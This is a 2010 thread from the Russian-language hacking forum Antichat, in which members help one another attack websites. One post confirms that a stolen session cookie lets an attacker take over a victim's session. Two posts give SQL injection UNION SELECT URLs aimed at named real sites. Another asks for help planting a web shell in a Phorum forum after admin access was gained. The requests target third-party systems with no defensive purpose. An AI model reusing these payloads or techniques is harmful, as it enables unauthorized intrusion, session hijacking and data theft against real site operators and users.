ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
16.05.2010, 01:50
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Сообщение от DrakonHaSh
Я правильно понимаю что если мы узнаем sess_xxx из темпа или через куки у "жертвы" то подменив у себя на такой же сервер будет считать все $_SESSION['BlaBla'] "жертвы" также и нашими ?
или там IP тоже играет роль ?
Правильно! А IP зависит от скрипта(CMS), если там проверка Ip есть то ничего не выйдет, так как к каждому юзеру прикреплён свой ip! 
|
|
|
16.05.2010, 06:42
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861
Репутация:
5
|
|
http://fragoria.mail.ru/info.php?Id=219+UNION+SELECT+CONCAT(0x3a,Version() ,0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x3a)--
Парни помогите крутануть.
|
|
|
|
16.05.2010, 09:23
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Доброе утро всем форумчанам, суть вопроса: есть форум phorum 5.2.10 и доступ в админку, собственно как шелл залить?
|
|
|
|
16.05.2010, 11:19
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
Сообщение от Gorev
Доброе утро всем форумчанам, суть вопроса: есть форум phorum 5.2.10 и доступ в админку, собственно как шелл залить?
Мельком смотрел двиг, способа заливки не нашел. Если у кого есть наработки(или готовые методы реализации), велкам в ПМ.
|
|
|
|
16.05.2010, 12:24
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Iceangel_
Мельком смотрел двиг, способа заливки не нашел. Если у кого есть наработки(или готовые методы реализации), велкам в ПМ.
в админке я разрешил аплоад файлов и добавил тип пхп, в панели управления юзера на форуме файл загрузился..но не знаю куда, когда нажимаю на сам файл, он скачивается...ссылка на файл такого типа http://www.site.ru/forum/file.php?1,file=304,filename=шелл
|
|
|
|
16.05.2010, 13:10
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
Сообщение от Gorev
в админке я разрешил аплоад файлов и добавил тип пхп, в панели управления юзера на форуме файл загрузился..но не знаю куда, когда нажимаю на сам файл, он скачивается...ссылка на файл такого типа http://www.site.ru/forum/file.php?1,file=304,filename=шелл
дело в том, что файлы в phorum не аплоадятся, а заносятся в БД.
|
|
|
|
16.05.2010, 12:31
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Gorev
а tamper Data не показывает директорию?
а может просто файлы в этой папке не интерпретируются? 
|
|
|
|
16.05.2010, 13:04
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Как понять? что это?
The used SELECT statements have a different number of columns
|
|
|
|
16.05.2010, 13:10
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от geforce
Как понять? что это?
The used SELECT statements have a different number of columns
количество колонок не совпадают
|
|
|
|
16.05.2010, 13:13
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Сообщение от Konqi
количество колонок не совпадают
http://expert-poisk.ru/spravka.php?act=show_cat&cat=30+union+select+1,2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/
везде подставляю version() и не чего не выводит? Почему?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
